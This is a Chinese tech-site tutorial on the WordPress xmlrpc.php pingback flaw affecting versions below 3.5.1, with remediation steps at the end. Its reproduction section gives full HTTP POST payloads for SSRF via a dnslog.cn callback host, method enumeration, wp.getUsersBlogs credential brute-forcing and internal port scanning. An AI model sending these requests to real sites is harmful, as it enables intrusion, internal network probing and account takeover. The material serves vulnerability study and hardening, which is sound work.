今天这篇我们来学习和了解“WordPress漏洞有何影响，如何复现并解决”，下文的讲解详细，步骤过程清晰，对大家进一步学习和理解“WordPress漏洞有何影响，如何复现并解决”有一定的帮助。有这方面学习需要的朋友就继续往下看吧！

一、漏洞介绍

通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery，SSRF)和远程端口扫描。

二、漏洞影响

WordPress 版本< 3.5.1

造成的影响
1、可以对业务内网进行探测。
2、攻击运行在内网或本地的应用程序（比如溢出攻击）。
3、利用file协议读取本地文件等

三、漏洞复现

第一步：直接访问这个文件，初步判断

第二步：发现POC验证数据包 

POST /xmlrpc.php HTTP/1.1
Host: www.目标.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 310
 
<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://g8o53x.dnslog.cn/</string></value></param>
    <param><value><string>http://www.目标.com/?p=1</string></value></param>
    </params>
    </methodCall>

发送数据包

验证成功 ！

四、深入利用

（一）查看系统允许的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

 （二）账号爆破

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

（三）通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery，SSRF)和远程端口扫描。

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
.......
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口：http://127.0.0.1:80</string></value>
</param><param><value><string>要探测的URL</string>
</value></param></params>
</methodCall>

五、漏洞修复

（一）通过APACHE的.htaccess屏蔽xmlrpc.php文件的访问。配置代码如下：

# protect xmlrpc
<Files "xmlrpc.php">
Order Allow,Deny
Deny from all
</Files>

（二）删除根目录下的xmlrpc.php。

到此这篇关于“WordPress漏洞有何影响，如何复现并解决”的文章就介绍到这了,更多相关WordPress漏洞有何影响，如何复现并解决内容，欢迎关注群英网络技术资讯频道，小编将为大家输出更多高质量的实用文章！

免责声明：本站发布的内容（图片、视频和文字）以原创、转载和分享为主，文章观点不代表本网站立场，如果涉及侵权请联系站长邮箱：mmqy2019@163.com进行举报，并提供相关证据，查实之后，将立刻删除涉嫌侵权内容。

猜你喜欢

• Laravel中auth在做数据库迁移遇到的问题怎样解决

  今天小编就为大家分享一篇解决在laravel中auth建立时候遇到的问题，具有很好的参考价值，希望对大家有所帮助。一起跟随小编过来看看吧

• php中信号处理函数有哪些？怎样做信号处理操作？

  关于php中的信号处理器和信号处理操作，很多新手不是很清楚，这篇文章小编就给大家介绍一些关于php的信号说明以及信号处理操作，感兴趣的朋友可以看一看。

• php怎样实现商城购物车？一文带你了解实现过程

  php如何实现商城的购物车功能？购物车是商城网站必不可少的，要具备添加，删除商品以及提交订单的功能，那么购物车的功能要怎么样实现呢？下面分享一个PHP实现购物功能的代码，有需要的朋友可以参考参考。

• PHP要怎样获取Cookie？登录功能的实现你了解吗

  PHP怎样获取Cookie以及实现登录功能？我们做登录页面，少不了对Cookie的获取，这篇文章就主要介绍Cookie的获取以及实现模拟登录功能，感兴趣的朋友就继续往下看吧。

• PHP7下连接不同数据库的方式是什么，怎样做

  在PHP7中已经废除了mysql库了，则只能使用mysqli及PDOmysqli面向对象风格<?php$serve = 'localhost:3306';$username = 'root';$password = 'admin123';$dbname = 'examples';$mysqli = new Mysqli($serve,$username,$password,...